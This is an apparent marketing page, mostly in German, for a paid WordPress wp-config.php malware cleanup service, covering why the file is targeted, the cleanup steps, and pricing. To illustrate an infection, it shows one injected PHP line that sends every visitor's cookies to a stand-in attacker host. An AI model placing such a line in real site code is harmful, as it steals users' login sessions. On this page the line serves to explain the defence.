PHARMA-HACK · WORDPRESS · BEREINIGT
wp-config.php malware cleanup.
wp-config.php läuft bei jedem WordPress-Seitenaufruf — deshalb lieben Angreifer sie. Wir entfernen die Injektion, rotieren die Schlüssel und sagen Ihnen, worauf der Angreifer Zugriff hatte. Pauschal 279 $.
MECHANISMUS
wp-config.php ist der schlechteste Ort für Angreifer-Code.
wp-config.php wird bei jeder WordPress-Anfrage geladen, bevor WordPress selbst filtern kann. Wer diese Datei verändert, kann auf jeder Seite Code ausführen, jede Anmeldung mitschneiden oder versteckte Admins anlegen, die im Dashboard nicht erscheinen.
Sobald wp-config.php angefasst wurde, gelten Ihre Salts, das Datenbank-Passwort und die Authentifizierungsschlüssel als kompromittiert. Wir rotieren alles im Rahmen der Bereinigung — kein Upselling.
01 02 // Legitimate wp-config starts with constants. 03 define('DB_NAME', 'wp_database'); 04 05 // Injected — sends auth cookies to attacker on every request: 06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);
What I remove
Jede Zeile, jeder Schlüssel, jedes Konto.
-
PLUGIN-TRIAGE
wp-config.php Zeile für Zeile mit einem sauberen Basiszustand verglichen. Jede nicht standardmäßige Zeile wird geprüft.
-
WP-CONFIG
Eingeschleuster Code entfernt. Verirrte include/require-Zeilen, die auf unbekannte Dateien zeigen — geprüft und entfernt.
-
SCHLÜSSEL
AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY und ihre Salts rotiert. Alle Sessions ungültig gemacht.
-
DATENBANK
Versteckte Admin-Nutzer entfernt. Autoloaded wp_options-Payloads auf zugehörige Persistenz geprüft.
-
ABSICHERUNG
Berechtigungen für wp-config.php verschärft. .htaccess- und Nginx-Regeln ergänzt, um direkten Zugriff zu verweigern.
-
BERICHT
Forensischer Bericht in verständlicher Sprache: worauf der Angreifer Zugriff hatte, was rotiert wurde, was Sie noch tun müssen.
Preise
Cleanup
$279
flat, one-time, per site
Manual cleanup, entry-vector identification, written forensic report.
Bereinigung startenMonitoring
$29 / mo
per site, cancel any time
Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.
Schützen lassenPart of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.
Alle Leistungen ansehen →E-Mail [email protected] or use the contact form.